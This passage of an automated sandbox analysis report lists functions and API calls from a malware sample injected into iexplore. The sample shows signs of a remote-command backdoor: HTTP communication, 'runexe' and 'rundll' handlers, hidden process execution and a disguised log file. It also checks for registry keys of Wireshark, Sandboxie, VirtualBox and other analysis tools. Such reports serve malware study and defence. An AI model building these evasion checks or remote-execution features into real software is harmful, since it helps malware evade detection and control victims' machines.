      • Part of subcall function 00514548: GetLocalTime.KERNEL32(?,00000000,?,00000000), ref: 005145A6
      • Part of subcall function 00514548: GetNativeSystemInfo.KERNEL32(?), ref: 005145EB
      • Part of subcall function 00514548: memset.MSVCRT ref: 00514681
    • rand.MSVCRT ref: 0051479C
    • ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 005190CF: ??2@YAPAXI@Z.MSVCRT ref: 0051910D
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 0051911A
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519127
      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519141
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 00519159
      • Part of subcall function 005190CF: ??3@YAXPAX@Z.MSVCRT ref: 005191AD
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 0051481E
    • ??3@YAXPAX@Z.MSVCRT ref: 00514862
      • Part of subcall function 005130ED: WinHttpReceiveResponse.WINHTTP(?,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513167
      • Part of subcall function 005130ED: GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513171
      • Part of subcall function 005130ED: WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000,000004A9,000003E9,0000D10B,00000000,00000000,000003E9,?,?), ref: 00513188
      • Part of subcall function 005130ED: GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513192
      • Part of subcall function 005130ED: WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D0
      • Part of subcall function 005130ED: GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D2
      • Part of subcall function 005130ED: WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131EC
      • Part of subcall function 005130ED: _wtoi.MSVCRT ref: 005131F2
      • Part of subcall function 005130ED: WinHttpQueryAuthSchemes.WINHTTP(?,?,?,:EQ,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051323C
      • Part of subcall function 005130ED: WinHttpSetCredentials.WINHTTP(?,:EQ,?,00000729,0000075B,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051325A
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051494C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61file
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051496C
    • ReadFile.KERNEL32(00000000,?,00000269,?,00000000), ref: 00514993
    • CloseHandle.KERNEL32(00000000), ref: 0051499A
    • ??2@YAPAXI@Z.MSVCRT ref: 005149A7
      • Part of subcall function 0051841D: memset.MSVCRT ref: 00518446
    • ??3@YAXPAX@Z.MSVCRT ref: 005149CD
    Strings
    • Ss)4:WKsRr(3/VJrQq&2.UIqPp%1-THp, xrefs: 005149AF
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511098, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 005110AB
    • memset.MSVCRT ref: 005110B5
    • UrlMkGetSessionOption.URLMON(10000001,00000000,00000104,?,00000000), ref: 005110C9
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00511080,00000104,?,?,00511094,?,?,?,?,?,?,?), ref: 005110F0
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 00511117
    Strings
    • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;, xrefs: 00511100
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00516716, Relevance: 9.4, APIs: 6, Instructions: 427registry
    APIs
      • Part of subcall function 005166E9: IsWow64Process.KERNELBASE(000000FF,00000340,?,?,?,005168F0,?,?,?,00000340,00000000), ref: 005166F4
      • Part of subcall function 005166E9: GetNativeSystemInfo.KERNEL32(?), ref: 005166FE
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
      • Part of subcall function 0051668C: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
      • Part of subcall function 0051668C: RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
    • _strdup.MSVCRT(?,?,?,?,?,00020019,?,?,?,?,00020019,?,?,?,00000000,00020019), ref: 00516AEA
    • _strdup.MSVCRT(?,?,?,?,?,00020019,?,?,?,?,00020019,?,?,?,?,00020019), ref: 00516B65
    • realloc.MSVCRT ref: 00516BD0
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516C7E
    • realloc.MSVCRT ref: 00516CC2
    • RegCloseKey.ADVAPI32(?), ref: 00516D18
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 00516667: RegOpenKeyExA.KERNEL32(00000340,?,00000000,?,?,?,0051696E,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516679
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F1A6D, Relevance: 9.1, APIs: 6, Instructions: 94
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1A8C
    • memset.MSVCRT ref: 004F1A9C
    • memcpy.MSVCRT ref: 004F1AB8
    • memcpy.MSVCRT ref: 004F1AE9
    • ??3@YAXPAX@Z.MSVCRT ref: 004F1AFE
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1B1B
      • Part of subcall function 004F1B6D: __EH_prolog3_GS.LIBCMT ref: 004F1B77
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1BC6
      • Part of subcall function 004F1B6D: memset.MSVCRT ref: 004F1BD6
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1C4A
      • Part of subcall function 004F1B6D: memcpy.MSVCRT ref: 004F1C63
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00514C71, Relevance: 9.0, APIs: 6, Instructions: 50network
    APIs
    • memset.MSVCRT ref: 00514C9D
    • WSAStartup.WS2_32(00000002,?), ref: 00514CAE
    • gethostname.WS2_32(00000000,00000100), ref: 00514CC3
    • gethostbyname.WS2_32(00000000), ref: 00514CD3
    • inet_ntoa.WS2_32(?), ref: 00514CE3
    • WSACleanup.WS2_32 ref: 00514CF2
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005144A4, Relevance: 7.6, APIs: 5, Instructions: 68
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 005144D4
    • memset.MSVCRT ref: 005144E0
    • memcpy.MSVCRT ref: 005144F8
    • ??3@YAXPAX@Z.MSVCRT ref: 00514516
    • ??3@YAXPAX@Z.MSVCRT ref: 00514520
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F1B6D, Relevance: 7.6, APIs: 5, Instructions: 65
    APIs
    • __EH_prolog3_GS.LIBCMT ref: 004F1B77
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1BC6
    • memset.MSVCRT ref: 004F1BD6
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1C4A
    • memcpy.MSVCRT ref: 004F1C63
      • Part of subcall function 004F1A3C: __EH_prolog3.LIBCMT ref: 004F1A43
      • Part of subcall function 004F1A3C: ??3@YAXPAX@Z.MSVCRT ref: 004F1A52
      • Part of subcall function 004F1A3C: ??3@YAXPAX@Z.MSVCRT ref: 004F1A5E
      • Part of subcall function 004F1FDE: ??2@YAPAXI@Z.MSVCRT ref: 004F1FE3
      • Part of subcall function 004F1FDE: ??2@YAPAXI@Z.MSVCRT ref: 004F2015
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00511B49, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00513E74,00000000,00000000,?), ref: 00511B60
    • GetLastError.KERNEL32 ref: 00511B6C
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    • OpenHttpByNoProxy WinHttpOpen Failed! - %d, xrefs: 00511B73
    • Try Http by no proxy., xrefs: 00511B4B
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F15F1, Relevance: 6.1, APIs: 4, Instructions: 64file
    APIs
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 004F1625
    • MapViewOfFile.KERNELBASE(00000000,00000022,00000000,00000000,00000000), ref: 004F1634
      • Part of subcall function 004F1864: memmove.MSVCRT ref: 004F1879
      • Part of subcall function 004F1864: memmove.MSVCRT ref: 004F18B2
      • Part of subcall function 004F1694: memset.MSVCRT ref: 004F16EA
      • Part of subcall function 004F1694: GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 004F171B
      • Part of subcall function 004F1694: GetLastError.KERNEL32(?,00000000,00000000), ref: 004F1728
      • Part of subcall function 004F1694: LoadLibraryExA.KERNELBASE(?,00000000,00000008,?,00000000,00000000), ref: 004F1736
      • Part of subcall function 004F1694: GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 004F176C
      • Part of subcall function 004F1694: GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 004F178C
      • Part of subcall function 004F1694: GetLastError.KERNEL32(?,00000000,00000000), ref: 004F17DC
    • UnmapViewOfFile.KERNEL32(?), ref: 004F1657
    • CloseHandle.KERNEL32(?), ref: 004F1660
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 0051668C, Relevance: 3.0, APIs: 2, Instructions: 44registry
    APIs
      • Part of subcall function 00516667: RegOpenKeyExA.KERNEL32(00000340,?,00000000,?,?,?,0051696E,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516679
    • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
    • RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511024, Relevance: 3.0, APIs: 2, Instructions: 41
    APIs
    • time.MSVCRT ref: 00511080
    • srand.MSVCRT ref: 00511086
      • Part of subcall function 00511098: ??2@YAPAXI@Z.MSVCRT ref: 005110AB
      • Part of subcall function 00511098: memset.MSVCRT ref: 005110B5
      • Part of subcall function 00511098: UrlMkGetSessionOption.URLMON(10000001,00000000,00000104,?,00000000), ref: 005110C9
      • Part of subcall function 00511098: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00511080,00000104,?,?,00511094,?,?,?,?,?,?,?), ref: 005110F0
      • Part of subcall function 00511098: ??3@YAXPAX@Z.MSVCRT ref: 00511117
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005166E9, Relevance: 3.0, APIs: 2, Instructions: 16
    APIs
    • IsWow64Process.KERNELBASE(000000FF,00000340,?,?,?,005168F0,?,?,?,00000340,00000000), ref: 005166F4
    • GetNativeSystemInfo.KERNEL32(?), ref: 005166FE
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F1FDE, Relevance: 2.5, APIs: 2, Instructions: 28
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00516667, Relevance: 1.5, APIs: 1, Instructions: 15registry
    APIs
    • RegOpenKeyExA.KERNEL32(00000340,?,00000000,?,?,?,0051696E,80000002,?,00020019,?,?,?,00000340,00000000), ref: 00516679
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Non-executed Functions

    Function 00515486, Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 408stringlibrarypipe
    APIs
    • memset.MSVCRT ref: 005154C7
    • ___swprintf_l.LIBCMT ref: 005154DA
    • strncmp.MSVCRT(?,runexe ,00000007,?,?,[%s],?,?,00000000,000001FF), ref: 005154E7
    • strncmp.MSVCRT(?,rundll ,00000007,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051555C
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • strstr.MSVCRT ref: 005155DB
    • LoadLibraryA.KERNEL32(?), ref: 005155F9
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051562D
    • ___swprintf_l.LIBCMT ref: 00515645
    • GetProcAddress.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001), ref: 00515664
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 00515698
    • ___swprintf_l.LIBCMT ref: 005156F8
    • GetSystemDirectoryA.KERNEL32(?,00000200), ref: 00515736
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005157B6
    • GetLastError.KERNEL32 ref: 005157C0
    • ___swprintf_l.LIBCMT ref: 00515808
    • memset.MSVCRT ref: 00515831
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 00515896
    • WaitForSingleObject.KERNEL32(?,?), ref: 005158BD
    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 005158F4
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00515922
    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 0051594B
    • memset.MSVCRT ref: 00515964
    • CloseHandle.KERNEL32(?), ref: 0051597A
    • CloseHandle.KERNEL32(?), ref: 00515982
    • CloseHandle.KERNEL32(?), ref: 00515992
    • CloseHandle.KERNEL32(?), ref: 0051599A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005114F8, Relevance: 51.1, APIs: 16, Strings: 13, Instructions: 335
    APIs
    • memset.MSVCRT ref: 0051154A
    • memset.MSVCRT ref: 00511561
    • memset.MSVCRT ref: 00511578
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 0051158C
    • ___swprintf_l.LIBCMT ref: 005115E4
    • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00511605
    • memset.MSVCRT ref: 0051167E
    • memset.MSVCRT ref: 00511695
    • _wfopen.MSVCRT ref: 0051177A
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • fgetws.MSVCRT ref: 005117B1
    • wcsstr.MSVCRT ref: 005117C6
    • wcsstr.MSVCRT ref: 0051185A
    • _wtoi.MSVCRT ref: 00511881
    • feof.MSVCRT ref: 00511893
    • fclose.MSVCRT ref: 005118A7
    • ___swprintf_l.LIBCMT ref: 005118E3
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F2A05, Relevance: 46.0, APIs: 7, Strings: 19, Instructions: 482
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F2A2A
    • memset.MSVCRT ref: 004F2A51
    • memset.MSVCRT ref: 004F2A6C
    • Process32FirstW.KERNEL32(?,?), ref: 004F2A7E
    • ___swprintf_l.LIBCMT ref: 004F2AA4
      • Part of subcall function 004F3197: _errno.MSVCRT ref: 004F31A4
      • Part of subcall function 004F3197: _wcslwr.MSVCRT ref: 004F31D6
    • Process32NextW.KERNEL32(?,?), ref: 004F2F6A
    • CloseHandle.KERNEL32(?), ref: 004F2F81
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 004F2FA1, Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 155string
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 004F2FC4
    • memset.MSVCRT ref: 004F2FD4
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004F2FE8
    • ??3@YAXPAX@Z.MSVCRT ref: 004F2FF5
    • ??2@YAPAXI@Z.MSVCRT ref: 004F2FFD
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004F300B
    • memset.MSVCRT ref: 004F3021
    • ___swprintf_l.LIBCMT ref: 004F3078
    • ??3@YAXPAX@Z.MSVCRT ref: 004F309C
    • strstr.MSVCRT ref: 004F30AB
    • strstr.MSVCRT ref: 004F30C1
    • strstr.MSVCRT ref: 004F30D5
    • strstr.MSVCRT ref: 004F30E9
    • strstr.MSVCRT ref: 004F30FD
    • strstr.MSVCRT ref: 004F3111
    • strstr.MSVCRT ref: 004F3125
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 004F28FC, Relevance: 29.8, APIs: 4, Strings: 13, Instructions: 85registry
    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,004F64AC,00000000,00020019,?,00000001,00000000,?), ref: 004F299F
    • RegCloseKey.ADVAPI32(?), ref: 004F29A8
    • RegOpenKeyExW.ADVAPI32(80000002,004F66B8,00000000,00020019,?,00000001,00000000,?), ref: 004F29DF
    • RegCloseKey.ADVAPI32(?), ref: 004F29E8
    Strings
    • SYSTEM\CurrentControlSet\Services\IRIS5, xrefs: 004F2950
    • Software\eEye Digital Security, xrefs: 004F2926
    • Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32, xrefs: 004F2934
    • Software\CommView, xrefs: 004F291F
    • SOFTWARE\ZxSniffer, xrefs: 004F295E
    • Software\Syser Soft, xrefs: 004F293B
    • SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSandboxie, xrefs: 004F2973
    • Software\Classes\Folder\shell\sandbox, xrefs: 004F2942
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark, xrefs: 004F2957
    • Software\Classes\*\shell\sandbox, xrefs: 004F2949
    • SYSTEM\CurrentControlSet\Services\VBoxGuest, xrefs: 004F2965
    • Software\Win Sniffer, xrefs: 004F292D
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions, xrefs: 004F296C
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 004F27E5, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 94registry
    APIs
    • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\ControlSet001\services\Disk\Enum,00000000,00020019,?,?), ref: 004F281A
    • GetLastError.KERNEL32 ref: 004F2824
    • printf.MSVCRT ref: 004F2830
    • memset.MSVCRT ref: 004F2852
    • RegQueryValueExW.ADVAPI32(?,004F646C,00000000,00000000,?,?), ref: 004F286C
    • wcsstr.MSVCRT ref: 004F288B
    • wcsstr.MSVCRT ref: 004F28A2
    • wcsstr.MSVCRT ref: 004F28B8
    • wcsstr.MSVCRT ref: 004F28CE
    • RegCloseKey.ADVAPI32(?), ref: 004F28DE
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
